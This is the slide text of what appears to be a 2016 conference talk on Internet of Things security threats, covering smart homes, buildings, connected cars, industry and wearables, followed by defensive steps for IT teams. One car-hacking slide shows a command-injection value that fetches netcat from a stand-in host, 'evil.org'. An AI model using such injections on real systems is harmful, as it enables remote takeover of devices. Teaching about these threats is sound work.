The Internet of Threats BILLIONS OF WAYS THE IOT POSES AN INFOSEC CHALLENGE

Chris Poulin

CyberCrime 2016 Symposium: Cyber Convergence

IoT Researcher, Futurist

Maker

Breaker

Threat intel

Data geek

Provocateur

TV & movies

The easiest way to hack an Airbus A319

Some questions to establish context

What is your role wrt the IoT? • Personal consumer of the IoT • Enterprise manager of IT systems • A maker of IoT devices

What is your biggest concern with the IoT? • Safety (e.g., HVAC systems gone wild) • Data privacy • Infrastructure security (e.g., IT comingling with IoT) • New enterprise attack vectors (e.g., end users with wearables)

Smart Home Device Examples: Home Security

Security control and alarm panels

Smart door locks

Smart garage doors

Motion detectors

Window and door contacts

Security cameras

Smart doorbells

Smart Fridge

Smart Lighting

Smart Dishwasher

Smart Oven

Smart Television Smart Utensils

Smart Wine

Smart Faucet

Smart Home Device Examples: Appliances, Lighting, Entertainment

Appliances • Refrigerators and cooktops • Beds • Autonomous vacuums

Lighting • Light bulbs (plain white and color changing) • Pathway lighting • Indoor and outdoor

Entertainment • Smart televisions and DVRs • Audio systems

Smart Home Device Examples: Environment & Safety

Smart thermostats Smoke / CO

detectors

Smart blinds Water leak detectors

Smart air conditioners

Baby monitors

Smart homes are vulnerable

Your WiFi password is “fluffy123”

“Buy V!gar4”

Why does home automation matter to enterprise IT security? Mirai malware infected devices

Krebs OVH Dyn

620-650 Gbps ~1 Tbps Amazon, PayPal, Box, Slack, Twitter, GitHub, Netflix, Airbnb, Pinterest, Quora, Spotify, Yelp, Second Life, WWE Network

Smart Elevators

Smart Lighting

Smart Doors

Concrete Monitors

IIoT Device Examples: Building Automation

Electric & water

HVAC

Security systems

Lighting

Elevators and escalators

Polarized windows

Earthquake absorbers

Concrete mixing & curing

And they will be connected to your IT networks

IT Network BAS Network

Connected Cars

Connected Infrastructure

IIoT Device Examples: Smart Cities & Municipalities

Utilities

Lighting

Traffic flow

Trash

Air quality

Violence detection

Connected vehicle threat surface

Engine Control Unit

Transmission Control Unit

Airbag Control Unit

Anti-lock Braking System

Tire Pressure Monitor

Vehicle to Vehicle / Vehicle to Infrastructure Communications

Instrument Cluster / Telematics

Keyless Entry / Anti-theft

OBD-II

Car Multimedia

Dynamic Stability Control

DSRC RF RF channel

Bluetooth, WiFi, media players

OnStar, Uconnect, etc.

Direct connection RF channel

IVIs are messy

Linux / Tizen / QNX

Audio module (open source?)

Video module (open source?)

Apple CarPlay module

Google Android module

Microsoft Sync module

GPS module

Telematics

Voice module (open source?) Update feature

WiFi module

…so let’s break one

Port 6667/TCP

V850

SPI

CAN bus

updates.txt somepkg ‘; wget http://evil.org/nc; nc …

Number of latent vulnerabilities in a modern luxury vehicle Using the Linux kernel as a comparative model (as of 10 Oct 2016)

15M lines of code in Linux Kernel

1,507 reported vulnerabilities

1 vulnerability in every 9,954 lines of code

Source: http://www.cvedetails.com/vulnerability-list/vendor_id-33/product_id-47/Linux-Linux-Kernel.html

~10,000 latent vulnerabilities

The perfect storm of resources & tools

eBay, SparkFun, etc.

http://www.ioactive.com/pdfs/IOActive_Adventures_in_Automotive_Networks_and_Control_Units.pdf http://illmatics.com/car_hacking_poories.pdf http://marco.guardigli.it/2010/10/hacking-your-car.html http://opengarages.org/handbook/

Build your own vehicle hacking lab & test cart

Protocol decodes available

IIoT Device Examples: Heavy Industries

Manufacturing: • Pumps • Conveyors • Robots

Energy & Utilities: • Smart meters • Transformers • Pumps • Dam gates

Industrial IoT incidents

German steel mill

Stuxnet

Agricultural vulnerabilities

Planters: seed depth

Sprayers: dosage manipulation

Silos: manipulate environment

Livestock: feeding, drug, and environmental systems manipulation

Milk: manipulate pasteurization and pH balancesystems

Hydroponics: manipulate environment

Irrigation: manipulate control and data

Seeds: manipulate environment

Slaughter: remote control—effect? Who knows…

Processing: manipulate waste system (reverse?)

IIoT Device Examples: Consumer Services

Healthcare • X-ray machines • Chemistry analyzers • Pacemakers, insulin pumps

Retail • Inventory tracking • Stocking & picking • Shipping

Healthcare: hacking a telesurgery unit

Wearable device examples

Apple Watch Android Wear

Google Glass Fitness Trackers

Pacemakers

Insulin pumps

Subcutaneous vitals monitor

Wearables security

Fitbit Bluetooth

Sync to PC

Malware: PC pwned!

Be Winston Wolfe. Solve problems.

“You’ve got a corpse in the car, minus a head. Take me to it.”

The layers of the IoT

Traditional IT Services & Security

IoT defense for IT security professionals (1 of 4)

1. Conduct an asset inventory

• Focus on critical assets and sensitive data

• NetFlow to passively identify assets

• VA scans to actively identify assets and add context

• RF scanning

• GQRX

• Scripting skilllz

IoT defense for IT security professionals (2 of 4)

2. Segment systems based on risk

• Enclave firewalls

• Software defined networks

3. Monitor & defend IoT devices on the network

• IDS / IPS

• NetFlow—look for anomalies

• Map relationships of wearables to mobile to users

IoT defense for IT security professionals (3 of 4)

4. Protect IT endpoints

• Endpoint protection software

• VA scanning / patching

• Phishing exercises

5. Collect logs and events from IoT devices

• Log management / SIEM

IoT defense for IT security professionals (4 of 4)

6. Update security policies to include IoT devices

7. Familiarize yourself with non-IT connected devices

https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project http://builditsecure.ly/ https://www.iamthecavalry.org/

Resources for makers